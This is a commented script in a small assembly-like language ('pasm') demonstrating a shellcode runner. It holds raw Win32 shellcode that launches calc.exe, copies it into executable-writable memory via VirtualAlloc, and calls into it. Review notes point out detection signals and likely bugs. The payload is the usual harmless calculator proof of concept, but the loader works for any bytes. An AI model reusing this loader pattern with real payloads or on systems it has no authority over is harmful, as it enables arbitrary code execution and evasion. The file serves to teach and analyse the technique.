; Program that demonstrates executing shellcode with pasm (using a Win32 calc.exe shellcode)
; arr: 176 raw bytes of 32-bit x86 machine code (the Win32 calc.exe shellcode
; named in the file header). The byte count equals the literal 176 that main
; passes to VirtualAlloc and that the copy loop uses as its bound; the three
; values must be changed together.
; ASCII fragments are readable in the bytes: "GetP"/"ress" (compared against
; export names), "CreateProcessA" and "ExitProcess" (built from pushed dwords)
; and "calc". They show which APIs the payload resolves and what it launches,
; and they are the kind of constants a static signature can match on.
set arr 0x31, 0xc9, 0xf7, 0xe1, 0x64, 0x8b, 0x41, 0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x14, 0xad, 0x96, 0xad, 0x8b, 0x58, 0x10, 0x8b, 0x53, 0x3c, 0x01, 0xda, 0x8b, 0x52, 0x78, 0x01, 0xda, 0x8b, 0x72, 0x20, 0x01, 0xde, 0x31, 0xc9, 0x41, 0xad, 0x01, 0xd8, 0x81, 0x38, 0x47, 0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x0a, 0x72, 0x65, 0x73, 0x73, 0x75, 0xeb, 0x8b, 0x72, 0x24, 0x01, 0xde, 0x66, 0x8b, 0x0c, 0x4e, 0x49, 0x8b, 0x72, 0x1c, 0x01, 0xde, 0x8b, 0x14, 0x8e, 0x01, 0xda, 0x89, 0xd5, 0x31, 0xc9, 0x68, 0x73, 0x41, 0x61, 0x61, 0x66, 0x81, 0x6c, 0x24, 0x02, 0x61, 0x61, 0x68, 0x6f, 0x63, 0x65, 0x73, 0x68, 0x74, 0x65, 0x50, 0x72, 0x68, 0x43, 0x72, 0x65, 0x61, 0x54, 0x53, 0xff, 0xd2, 0x31, 0xc9, 0xb1, 0xff, 0x31, 0xff, 0x57, 0xe2, 0xfd, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x89, 0xe1, 0x51, 0x51, 0x31, 0xd2, 0x52, 0x52, 0x52, 0x52, 0x52, 0x52, 0x51, 0x52, 0xff, 0xd0, 0x83, 0xc4, 0x10, 0x68, 0x65, 0x73, 0x73, 0x61, 0x66, 0x83, 0x6c, 0x24, 0x03, 0x61, 0x68, 0x50, 0x72, 0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0x53, 0xff, 0xd5, 0x31, 0xc9, 0x51, 0xff, 0xd0
; main: reserve and commit a 176-byte region with VirtualAlloc, then load the
; registers that the copy loop below uses.
; Arguments are pushed last-to-first, so the call made here is
; VirtualAlloc(address=0, size=176, alloctype=0x3000, flprotect=0x40).
main:
|
|
; 64 = 0x40. A private region that is writable and executable at the same time
; is what W^X policies forbid and what memory scanners and EDR telemetry flag.
push 64 ; flprotect (PAGE_EXECUTE_READWRITE)
|
|
; 12288 = 0x3000 = 0x1000 (MEM_COMMIT) | 0x2000 (MEM_RESERVE)
push 12288 ; alloctype (MEM_COMMIT | MEM_RESERVE)
|
|
; 176 is the number of bytes in arr; it is repeated as the loop bound in memcpy.
push 176 ; size
|
|
; 0 lets the system choose where the region is placed.
push 0 ; address
|
|
; NOTE(review): the result in eax is used below without a check for 0, the
; value VirtualAlloc returns when the allocation fails.
call VirtualAlloc
|
|
|
|
; a4 keeps the base address untouched; it is pushed later for CallRawAddress
; and for VirtualFree.
mov a4, eax ; copy of address
|
|
; a1 is the destination cursor, advanced by the copy loop.
mov a1, eax ; address
|
|
; a3 is the source cursor, starting at arr.
mov a3, arr
|
|
; a2 counts the bytes copied so far.
mov a2, 0 ; count
; memcpy: copy loop that moves arr into the allocated region, one iteration per
; element, with a2 counting up to the bound 176.
; NOTE(review): jne and jmp take bare numbers here, presumably relative
; instruction offsets (jne 1 stepping past the exit jump, jmp 6 landing on the
; "push a4" after the loop) -- confirm against the pasm documentation before
; inserting or removing any instruction in this block.
memcpy:
|
|
; Loop test: a2 == 176 means every element has been copied.
cmp a2, 176
|
|
; Not finished yet: continue with the copy below.
jne 1
|
|
jmp 6 ; jmp out of memcpy
|
|
; Store the value a3 points at into the location a1 points at.
mov *a1, *a3
|
|
; Destination advances by one per iteration.
add a1, 1
|
|
; NOTE(review): the source advances by 8 while the destination advances by 1;
; presumably each arr element occupies 8 bytes in pasm -- confirm.
add a3, 8
|
|
add a2, 1
|
|
jmp memcpy
; Hand control to the copied bytes. a4 still holds the base address returned by
; VirtualAlloc; CallRawAddress presumably calls the address it is given.
; From this call on, the process executes the contents of arr rather than this
; script, so anything the payload does happens with this process's privileges.
push a4
|
|
call CallRawAddress
; memcpy_end: cleanup that follows the CallRawAddress call. Despite the name it
; is not the exit of the copy loop, which leaves through "jmp 6".
; Arguments are pushed last-to-first: VirtualFree(address=a4, size=0, freetype=0x8000).
; NOTE(review): the bytes in arr appear to finish by calling ExitProcess, in
; which case this release is never reached -- confirm.
memcpy_end:
|
|
; 32768 = 0x8000
push 32768 ; free type (MEM_RELEASE)
|
|
; MEM_RELEASE frees the whole region and requires a size of 0.
push 0 ; size (all)
|
|
push a4 ; address
|
|
call VirtualFree
|
|
end |